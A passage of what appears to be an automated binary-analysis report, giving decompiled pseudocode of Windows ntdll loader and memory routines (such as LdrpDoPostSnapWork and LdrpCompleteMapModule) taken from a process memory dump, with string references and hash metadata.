                    				signed int _t131;
                    				signed int _t134;
                    				signed int _t136;
                    				signed int _t143;
                    				signed int* _t147;
                    				signed int _t151;
                    				void* _t153;
                    				signed int* _t157;
                    				signed int _t159;
                    				signed int _t161;
                    				signed int _t166;
                    				signed int _t168;
                    
                    				_push(__ecx);
                    				_t153 = __ecx;
                    				_t159 = 0;
                    				_t121 = __ecx + 0x3c;
                    				if( *_t121 == 0) {
                    					L2:
                    					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                    					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                    						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                    						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                    						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                    							L6:
                    							if(E0147934A() != 0) {
                    								_t159 = E014EA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                    								__eflags = _t159;
                    								if(_t159 < 0) {
                    									_t81 =  *0x1555780; // 0x0
                    									__eflags = _t81 & 0x00000003;
                    									if((_t81 & 0x00000003) != 0) {
                    										_push(_t159);
                    										E014E5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                    										_t81 =  *0x1555780; // 0x0
                    									}
                    									__eflags = _t81 & 0x00000010;
                    									if((_t81 & 0x00000010) != 0) {
                    										asm("int3");
                    									}
                    								}
                    							}
                    						} else {
                    							_t159 = E0147849B(0, _t122, _t153, _t159, _t180);
                    							if(_t159 >= 0) {
                    								goto L6;
                    							}
                    						}
                    						_t80 = _t159;
                    						goto L8;
                    					} else {
                    						_t125 = 0x13;
                    						asm("int 0x29");
                    						_push(0);
                    						_push(_t159);
                    						_t161 = _t125;
                    						_t87 =  *( *[fs:0x30] + 0x1e8);
                    						_t143 = 0;
                    						_v40 = _t161;
                    						_t118 = 0;
                    						_push(_t153);
                    						__eflags = _t87;
                    						if(_t87 != 0) {
                    							_t118 = _t87 + 0x5d8;
                    							__eflags = _t118;
                    							if(_t118 == 0) {
                    								L46:
                    								_t118 = 0;
                    							} else {
                    								__eflags =  *(_t118 + 0x30);
                    								if( *(_t118 + 0x30) == 0) {
                    									goto L46;
                    								}
                    							}
                    						}
                    						_v32 = 0;
                    						_v28 = 0;
                    						_v16 = 0;
                    						_v20 = 0;
                    						_v12 = 0;
                    						__eflags = _t118;
                    						if(_t118 != 0) {
                    							__eflags = _t161;
                    							if(_t161 != 0) {
                    								__eflags =  *(_t118 + 8);
                    								if( *(_t118 + 8) == 0) {
                    									L22:
                    									_t143 = 1;
                    									__eflags = 1;
                    								} else {
                    									_t19 = _t118 + 0x40; // 0x40
                    									_t156 = _t19;
                    									E01478999(_t19,  &_v16);
                    									__eflags = _v0;
                    									if(_v0 != 0) {
                    										__eflags = _v0 - 1;
                    										if(_v0 != 1) {
                    											goto L22;
                    										} else {
                    											_t128 =  *(_t161 + 0x64);
                    											__eflags =  *(_t161 + 0x64);
                    											if( *(_t161 + 0x64) == 0) {
                    												goto L22;
                    											} else {
                    												E01478999(_t128,  &_v12);
                    												_t147 = _v12;
                    												_t91 = 0;
                    												__eflags = 0;
                    												_t129 =  *_t147;
                    												while(1) {
                    													__eflags =  *((intOrPtr*)(0x1555c60 + _t91 * 8)) - _t129;
                    													if( *((intOrPtr*)(0x1555c60 + _t91 * 8)) == _t129) {
                    														break;
                    													}
                    													_t91 = _t91 + 1;
                    													__eflags = _t91 - 5;
                    													if(_t91 < 5) {
                    														continue;
                    													} else {
                    														_t131 = 0;
                    														__eflags = 0;
                    													}
                    													L37:
                    													__eflags = _t131;
                    													if(_t131 != 0) {
                    														goto L22;
                    													} else {
                    														__eflags = _v16 - _t147;
                    														if(_v16 != _t147) {
                    															goto L22;
                    														} else {
                    															E01482280(_t92, 0x15586cc);
                    															_t94 = E01539DFB( &_v20);
                    															__eflags = _t94 - 1;
                    															if(_t94 != 1) {
                    															}
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															 *_t118 =  *_t118 + 1;
                    															asm("adc dword [ebx+0x4], 0x0");
                    															_t95 = E014961A0( &_v32);
                    															__eflags = _t95;
                    															if(_t95 != 0) {
                    																__eflags = _v32 | _v28;
                    																if((_v32 | _v28) != 0) {
                    																	_t71 = _t118 + 0x40; // 0x3f
                    																	_t134 = _t71;
                    																	goto L55;
                    																}
                    															}
                    															goto L30;
                    														}
                    													}
                    													goto L56;
                    												}
                    												_t92 = 0x1555c64 + _t91 * 8;
                    												asm("lock xadd [eax], ecx");
                    												_t131 = (_t129 | 0xffffffff) - 1;
                    												goto L37;
                    											}
                    										}
                    										goto L56;
                    									} else {
                    										_t143 = E01478A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                    										__eflags = _t143;
                    										if(_t143 != 0) {
                    											_t157 = _v12;
                    											_t103 = 0;
                    											__eflags = 0;
                    											_t136 =  &(_t157[1]);
                    											 *(_t161 + 0x64) = _t136;
                    											_t151 =  *_t157;
                    											_v20 = _t136;
                    											while(1) {
                    												__eflags =  *((intOrPtr*)(0x1555c60 + _t103 * 8)) - _t151;
                    												if( *((intOrPtr*)(0x1555c60 + _t103 * 8)) == _t151) {
                    													break;
                    												}
                    												_t103 = _t103 + 1;
                    												__eflags = _t103 - 5;
                    												if(_t103 < 5) {
                    													continue;
                    												}
                    												L21:
                    												_t105 = E014AF380(_t136, 0x1441184, 0x10);
                    												__eflags = _t105;
                    												if(_t105 != 0) {
                    													__eflags =  *_t157 -  *_v16;
                    													if( *_t157 >=  *_v16) {
                    														goto L22;
                    													} else {
                    														asm("cdq");
                    														_t166 = _t157[5] & 0x0000ffff;
                    														_t108 = _t157[5] & 0x0000ffff;
                    														asm("cdq");
                    														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                    														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                    														if(__eflags > 0) {
                    															L29:
                    															E01482280(_t108, 0x15586cc);
                    															 *_t118 =  *_t118 + 1;
                    															_t42 = _t118 + 0x40; // 0x3f
                    															_t156 = _t42;
                    															asm("adc dword [ebx+0x4], 0x0");
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															_t110 = E014961A0( &_v32);
                    															__eflags = _t110;
                    															if(_t110 != 0) {
                    																__eflags = _v32 | _v28;
                    																if((_v32 | _v28) != 0) {
                    																	_t134 = _v20;
                    																	L55:
                    																	E01539D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                    																}
                    															}
                    															L30:
                    															 *_t118 =  *_t118 + 1;
                    															asm("adc dword [ebx+0x4], 0x0");
                    															E0147FFB0(_t118, _t156, 0x15586cc);
                    															goto L22;
                    														} else {
                    															if(__eflags < 0) {
                    																goto L22;
                    															} else {
                    																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                    																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                    																	goto L22;
                    																} else {
                    																	goto L29;
                    																}
                    															}
                    														}
                    													}
                    													goto L56;
                    												}
                    												goto L22;
                    											}
                    											asm("lock inc dword [eax]");
                    											goto L21;
                    										}
                    									}
                    								}
                    							}
                    						}
                    						return _t143;
                    					}
                    				} else {
                    					_push( &_v8);
                    					_push( *((intOrPtr*)(__ecx + 0x50)));
                    					_push(__ecx + 0x40);
                    					_push(_t121);
                    					_push(0xffffffff);
                    					_t80 = E014A9A00();
                    					_t159 = _t80;
                    					if(_t159 < 0) {
                    						L8:
                    						return _t80;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    				L56:
                    			}

                    Strings
                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 014C9C18
                    • minkernel\ntdll\ldrsnap.c, xrefs: 014C9C28
                    • LdrpDoPostSnapWork, xrefs: 014C9C1E
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                    • API String ID: 2994545307-1948996284
                    • Opcode ID: cd6ca045f92efccfadcf1e846d9d75fefcfcfd067a99dd7fb8a759f07f8aa41f
                    • Instruction ID: 9fc74867db72c6103752df3ab4fed9727f25751cefa9849bd2e0205e89ed6569
                    • Opcode Fuzzy Hash: cd6ca045f92efccfadcf1e846d9d75fefcfcfd067a99dd7fb8a759f07f8aa41f
                    • Instruction Fuzzy Hash: 88910371A00207EBEF18DF59C885AFABBB5FF94314B16416FD905AB261E730E905CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E01477E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                    				char _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				signed int _t73;
                    				void* _t77;
                    				char* _t82;
                    				char* _t87;
                    				signed char* _t97;
                    				signed char _t102;
                    				intOrPtr _t107;
                    				signed char* _t108;
                    				intOrPtr _t112;
                    				intOrPtr _t124;
                    				intOrPtr _t125;
                    				intOrPtr _t126;
                    
                    				_t107 = __edx;
                    				_v12 = __ecx;
                    				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                    				_t124 = 0;
                    				_v20 = __edx;
                    				if(E0147CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                    					_t112 = _v8;
                    				} else {
                    					_t112 = 0;
                    					_v8 = 0;
                    				}
                    				if(_t112 != 0) {
                    					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                    						_t124 = 0xc000007b;
                    						goto L8;
                    					}
                    					_t73 =  *(_t125 + 0x34) | 0x00400000;
                    					 *(_t125 + 0x34) = _t73;
                    					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                    						goto L3;
                    					}
                    					 *(_t125 + 0x34) = _t73 | 0x01000000;
                    					_t124 = E0146C9A4( *((intOrPtr*)(_t125 + 0x18)));
                    					if(_t124 < 0) {
                    						goto L8;
                    					} else {
                    						goto L3;
                    					}
                    				} else {
                    					L3:
                    					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                    						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                    						L8:
                    						return _t124;
                    					}
                    					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                    						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                    							goto L5;
                    						}
                    						_t102 =  *0x1555780; // 0x0
                    						if((_t102 & 0x00000003) != 0) {
                    							E014E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                    							_t102 =  *0x1555780; // 0x0
                    						}
                    						if((_t102 & 0x00000010) != 0) {
                    							asm("int3");
                    						}
                    						_t124 = 0xc0000428;
                    						goto L8;
                    					}
                    					L5:
                    					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                    						goto L8;
                    					}
                    					_t77 = _a4 - 0x40000003;
                    					if(_t77 == 0 || _t77 == 0x33) {
                    						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                    						if(E01487D50() != 0) {
                    							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    						} else {
                    							_t82 = 0x7ffe0384;
                    						}
                    						_t108 = 0x7ffe0385;
                    						if( *_t82 != 0) {
                    							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                    								if(E01487D50() == 0) {
                    									_t97 = 0x7ffe0385;
                    								} else {
                    									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    								}
                    								if(( *_t97 & 0x00000020) != 0) {
                    									E014E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                    								}
                    							}
                    						}
                    						if(_a4 != 0x40000003) {
                    							L14:
                    							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                    							if(E01487D50() != 0) {
                    								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    							} else {
                    								_t87 = 0x7ffe0384;
                    							}
                    							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                    								if(E01487D50() != 0) {
                    									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    								}
                    								if(( *_t108 & 0x00000020) != 0) {
                    									E014E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                    								}
                    							}
                    							goto L8;
                    						} else {
                    							_v16 = _t125 + 0x24;
                    							_t124 = E0149A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                    							if(_t124 < 0) {
                    								E0146B1E1(_t124, 0x1490, 0, _v16);
                    								goto L8;
                    							}
                    							goto L14;
                    						}
                    					} else {
                    						goto L8;
                    					}
                    				}
                    			}

                    Strings
                    • LdrpCompleteMapModule, xrefs: 014C9898
                    • Could not validate the crypto signature for DLL %wZ, xrefs: 014C9891
                    • minkernel\ntdll\ldrmap.c, xrefs: 014C98A2
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                    • API String ID: 0-1676968949
                    • Opcode ID: 833ac48ebb72261a731072fffec525d8553fc02073c2c4379d9e336454e25f99
                    • Instruction ID: 0a6dc3f93bb321a7ed0d070dd7d0afd0ee3dc8f9c29c335f9ff13c658a9b3e86
                    • Opcode Fuzzy Hash: 833ac48ebb72261a731072fffec525d8553fc02073c2c4379d9e336454e25f99
                    • Instruction Fuzzy Hash: DC51F035600742EBE721CB6DC948BAB7BE4AB00725F540A6FE9519B3F1D734E901C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0146E620(void* __ecx, short* __edx, short* _a4) {
                    				char _v16;
                    				char _v20;
                    				intOrPtr _v24;
                    				char* _v28;
                    				char _v32;
                    				char _v36;
                    				char _v44;
                    				signed int _v48;
                    				intOrPtr _v52;
                    				void* _v56;
                    				void* _v60;
                    				char _v64;
                    				void* _v68;
                    				void* _v76;
                    				void* _v84;
                    				signed int _t59;
                    				signed int _t74;
                    				signed short* _t75;
                    				signed int _t76;
                    				signed short* _t78;
                    				signed int _t83;
                    				short* _t93;
                    				signed short* _t94;
                    				short* _t96;
                    				void* _t97;
                    				signed int _t99;
                    				void* _t101;
                    				void* _t102;
                    
                    				_t80 = __ecx;
                    				_t101 = (_t99 & 0xfffffff8) - 0x34;
                    				_t96 = __edx;
                    				_v44 = __edx;
                    				_t78 = 0;
                    				_v56 = 0;
                    				if(__ecx == 0 || __edx == 0) {
                    					L28:
                    					_t97 = 0xc000000d;
                    				} else {
                    					_t93 = _a4;
                    					if(_t93 == 0) {
                    						goto L28;
                    					}
                    					_t78 = E0146F358(__ecx, 0xac);
                    					if(_t78 == 0) {
                    						_t97 = 0xc0000017;
                    						L6:
                    						if(_v56 != 0) {
                    							_push(_v56);
                    							E014A95D0();
                    						}
                    						if(_t78 != 0) {
                    							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                    						}
                    						return _t97;
                    					}
                    					E014AFA60(_t78, 0, 0x158);
                    					_v48 = _v48 & 0x00000000;
                    					_t102 = _t101 + 0xc;
                    					 *_t96 = 0;
                    					 *_t93 = 0;
                    					E014ABB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                    					_v36 = 0x18;
                    					_v28 =  &_v44;
                    					_v64 = 0;
                    					_push( &_v36);
                    					_push(0x20019);
                    					_v32 = 0;
                    					_push( &_v64);
                    					_v24 = 0x40;
                    					_v20 = 0;
                    					_v16 = 0;
                    					_t97 = E014A9600();
                    					if(_t97 < 0) {
                    						goto L6;
                    					}
                    					E014ABB40(0,  &_v36, L"InstallLanguageFallback");
                    					_push(0);
                    					_v48 = 4;
                    					_t97 = L0146F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                    					if(_t97 >= 0) {
                    						if(_v52 != 1) {
                    							L17:
                    							_t97 = 0xc0000001;
                    							goto L6;
                    						}
                    						_t59 =  *_t78 & 0x0000ffff;
                    						_t94 = _t78;
                    						_t83 = _t59;
                    						if(_t59 == 0) {
                    							L19:
                    							if(_t83 == 0) {
                    								L23:
                    								E014ABB40(_t83, _t102 + 0x24, _t78);
                    								if(L014743C0( &_v48,  &_v64) == 0) {
                    									goto L17;
                    								}
                    								_t84 = _v48;
                    								 *_v48 = _v56;
                    								if( *_t94 != 0) {
                    									E014ABB40(_t84, _t102 + 0x24, _t94);
                    									if(L014743C0( &_v48,  &_v64) != 0) {
                    										 *_a4 = _v56;
                    									} else {
                    										_t97 = 0xc0000001;
                    										 *_v48 = 0;
                    									}
                    								}
                    								goto L6;
                    							}
                    							_t83 = _t83 & 0x0000ffff;
                    							while(_t83 == 0x20) {
                    								_t94 =  &(_t94[1]);
                    								_t74 =  *_t94 & 0x0000ffff;
                    								_t83 = _t74;
                    								if(_t74 != 0) {
                    									continue;
                    								}
                    								goto L23;
                    							}
                    							goto L23;
                    						} else {
                    							goto L14;
                    						}
                    						while(1) {
                    							L14:
                    							_t27 =  &(_t94[1]); // 0x2
                    							_t75 = _t27;
                    							if(_t83 == 0x2c) {
                    								break;
                    							}
                    							_t94 = _t75;
                    							_t76 =  *_t94 & 0x0000ffff;
                    							_t83 = _t76;
                    							if(_t76 != 0) {
                    								continue;
                    							}
                    							goto L23;
                    						}
                    						 *_t94 = 0;
                    						_t94 = _t75;
                    						_t83 =  *_t75 & 0x0000ffff;
                    						goto L19;
                    					}
                    				}
                    			}

                    Strings
                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0146E68C
                    • InstallLanguageFallback, xrefs: 0146E6DB
                    • @, xrefs: 0146E6C0
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                    • API String ID: 0-1757540487
                    • Opcode ID: 0348e921293634115cbb010e760ff769d255f319d752e8fdae21e9cd147f6e8d
                    • Instruction ID: be5466ab5b5bb4be908ef42fe8578dac1c1c850968c3f7338979b1d366b16cdc
                    • Opcode Fuzzy Hash: 0348e921293634115cbb010e760ff769d255f319d752e8fdae21e9cd147f6e8d
                    • Instruction Fuzzy Hash: 2551B3796083069BD710DF29D440BAFB7E8AF98615F45092FF985EB360E734E904C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E0152E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                    				signed int _v20;
                    				char _v24;
                    				signed int _v40;
                    				char _v44;
                    				intOrPtr _v48;
                    				signed int _v52;
                    				unsigned int _v56;
                    				char _v60;
                    				signed int _v64;
                    				char _v68;
                    				signed int _v72;
                    				void* __ebx;
                    				void* __edi;
                    				char _t87;
                    				signed int _t90;
                    				signed int _t94;
                    				signed int _t100;
                    				intOrPtr* _t113;
                    				signed int _t122;
                    				void* _t132;
                    				void* _t135;
                    				signed int _t139;
                    				signed int* _t141;
                    				signed int _t146;
                    				signed int _t147;
                    				void* _t153;
                    				signed int _t155;
                    				signed int _t159;
                    				char _t166;
                    				void* _t172;
                    				void* _t176;
                    				signed int _t177;
                    				intOrPtr* _t179;
                    
                    				_t179 = __ecx;
                    				_v48 = __edx;
                    				_v68 = 0;
                    				_v72 = 0;
                    				_push(__ecx[1]);
                    				_push( *__ecx);
                    				_push(0);
                    				_t153 = 0x14;
                    				_t135 = _t153;
                    				_t132 = E0152BBBB(_t135, _t153);
                    				if(_t132 == 0) {
                    					_t166 = _v68;
                    					goto L43;
                    				} else {
                    					_t155 = 0;
                    					_v52 = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_v56 = __ecx[1];
                    					if( *__ecx >> 8 < 2) {
                    						_t155 = 1;
                    						_v52 = 1;
                    					}
                    					_t139 = _a4;
                    					_t87 = (_t155 << 0xc) + _t139;
                    					_v60 = _t87;
                    					if(_t87 < _t139) {
                    						L11:
                    						_t166 = _v68;
                    						L12:
                    						if(_t132 != 0) {
                    							E0152BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                    						}
                    						L43:
                    						if(_v72 != 0) {
                    							_push( *((intOrPtr*)(_t179 + 4)));
                    							_push( *_t179);
                    							_push(0x8000);
                    							E0152AFDE( &_v72,  &_v60);
                    						}
                    						L46:
                    						return _t166;
                    					}
                    					_t90 =  *(_t179 + 0xc) & 0x40000000;
                    					asm("sbb edi, edi");
                    					_t172 = ( ~_t90 & 0x0000003c) + 4;
                    					if(_t90 != 0) {
                    						_push(0);
                    						_push(0x14);
                    						_push( &_v44);
                    						_push(3);
                    						_push(_t179);
                    						_push(0xffffffff);
                    						if(E014A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                    							_push(_t139);
                    							E0152A80D(_t179, 1, _v40, 0);
                    							_t172 = 4;
                    						}
                    					}
                    					_t141 =  &_v72;
                    					if(E0152A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                    						_v64 = _a4;
                    						_t94 =  *(_t179 + 0xc) & 0x40000000;
                    						asm("sbb edi, edi");
                    						_t176 = ( ~_t94 & 0x0000003c) + 4;
                    						if(_t94 != 0) {
                    							_push(0);
                    							_push(0x14);
                    							_push( &_v24);
                    							_push(3);
                    							_push(_t179);
                    							_push(0xffffffff);
                    							if(E014A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                    								_push(_t141);
                    								E0152A80D(_t179, 1, _v20, 0);
                    								_t176 = 4;
                    							}
                    						}
                    						if(E0152A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                    							goto L11;
                    						} else {
                    							_t177 = _v64;
                    							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                    							_t100 = _v52 + _v52;
                    							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                    							 *(_t132 + 0x10) = _t146;
                    							asm("bsf eax, [esp+0x18]");
                    							_v52 = _t100;
                    							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                    							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                    							_t47 =  &_a8;
                    							 *_t47 = _a8 & 0x00000001;
                    							if( *_t47 == 0) {
                    								E01482280(_t179 + 0x30, _t179 + 0x30);
                    							}
                    							_t147 =  *(_t179 + 0x34);
                    							_t159 =  *(_t179 + 0x38) & 1;
                    							_v68 = 0;
                    							if(_t147 == 0) {
                    								L35:
                    								E0147B090(_t179 + 0x34, _t147, _v68, _t132);
                    								if(_a8 == 0) {
                    									E0147FFB0(_t132, _t177, _t179 + 0x30);
                    								}
                    								asm("lock xadd [eax], ecx");
                    								asm("lock xadd [eax], edx");
                    								_t132 = 0;
                    								_v72 = _v72 & 0;
                    								_v68 = _v72;
                    								if(E01487D50() == 0) {
                    									_t113 = 0x7ffe0388;
                    								} else {
                    									_t177 = _v64;
                    									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    								}
                    								if( *_t113 == _t132) {
                    									_t166 = _v68;
                    									goto L46;
                    								} else {
                    									_t166 = _v68;
                    									E0151FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                    									goto L12;
                    								}
                    							} else {
                    								L23:
                    								while(1) {
                    									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                    										_t122 =  *_t147;
                    										if(_t159 == 0) {
                    											L32:
                    											if(_t122 == 0) {
                    												L34:
                    												_v68 = 0;
                    												goto L35;
                    											}
                    											L33:
                    											_t147 = _t122;
                    											continue;
                    										}
                    										if(_t122 == 0) {
                    											goto L34;
                    										}
                    										_t122 = _t122 ^ _t147;
                    										goto L32;
                    									}
                    									_t122 =  *(_t147 + 4);
                    									if(_t159 == 0) {
                    										L27:
                    										if(_t122 != 0) {
                    											goto L33;
                    										}
                    										L28:
                    										_v68 = 1;
                    										goto L35;
                    									}
                    									if(_t122 == 0) {
                    										goto L28;
                    									}
                    									_t122 = _t122 ^ _t147;
                    									goto L27;
                    								}
                    							}
                    						}
                    					}
                    					_v72 = _v72 & 0x00000000;
                    					goto L11;
                    				}
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: `$`
                    • API String ID: 0-197956300
                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction ID: d85b13fc0a9e3aa4df300051e4a3ee8cd5460caf46797d3c422fa906faf9ca0d
                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                    • Instruction Fuzzy Hash: 479170322043529BE725CE29C842B5BBBE5FF85714F18892DFA95CB2D0E774E904CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E014E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed short* _t63;
                    				signed int _t64;
                    				signed int _t65;
                    				signed int _t67;
                    				intOrPtr _t74;
                    				intOrPtr _t84;
                    				intOrPtr _t88;
                    				intOrPtr _t94;
                    				void* _t100;
                    				void* _t103;
                    				intOrPtr _t105;
                    				signed int _t106;
                    				short* _t108;
                    				signed int _t110;
                    				signed int _t113;
                    				signed int* _t115;
                    				signed short* _t117;
                    				void* _t118;
                    				void* _t119;
                    
                    				_push(0x80);
                    				_push(0x15405f0);
                    				E014BD0E8(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                    				_t115 =  *(_t118 + 0xc);
                    				 *(_t118 - 0x7c) = _t115;
                    				 *((char*)(_t118 - 0x65)) = 0;
                    				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                    				_t113 = 0;
                    				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                    				 *((intOrPtr*)(_t118 - 4)) = 0;
                    				_t100 = __ecx;
                    				if(_t100 == 0) {
                    					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                    					E0147EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    					 *((char*)(_t118 - 0x65)) = 1;
                    					_t63 =  *(_t118 - 0x90);
                    					_t101 = _t63[2];
                    					_t64 =  *_t63 & 0x0000ffff;
                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                    					L20:
                    					_t65 = _t64 >> 1;
                    					L21:
                    					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                    					if(_t108 == 0) {
                    						L27:
                    						 *_t115 = _t65 + 1;
                    						_t67 = 0xc0000023;
                    						L28:
                    						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                    						L29:
                    						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                    						E014E53CA(0);
                    						return E014BD130(0, _t113, _t115);
                    					}
                    					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                    						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                    							 *_t108 = 0;
                    						}
                    						goto L27;
                    					}
                    					 *_t115 = _t65;
                    					_t115 = _t65 + _t65;
                    					E014AF3E0(_t108, _t101, _t115);
                    					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                    					_t67 = 0;
                    					goto L28;
                    				}
                    				_t103 = _t100 - 1;
                    				if(_t103 == 0) {
                    					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                    					_t74 = E01483690(1, _t117, 0x1441810, _t118 - 0x74);
                    					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                    					_t101 = _t117[2];
                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                    					if(_t74 < 0) {
                    						_t64 =  *_t117 & 0x0000ffff;
                    						_t115 =  *(_t118 - 0x7c);
                    						goto L20;
                    					}
                    					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                    					_t115 =  *(_t118 - 0x7c);
                    					goto L21;
                    				}
                    				if(_t103 == 1) {
                    					_t105 = 4;
                    					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                    					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                    					_push(_t118 - 0x70);
                    					_push(0);
                    					_push(0);
                    					_push(_t105);
                    					_push(_t118 - 0x78);
                    					_push(0x6b);
                    					 *((intOrPtr*)(_t118 - 0x64)) = E014AAA90();
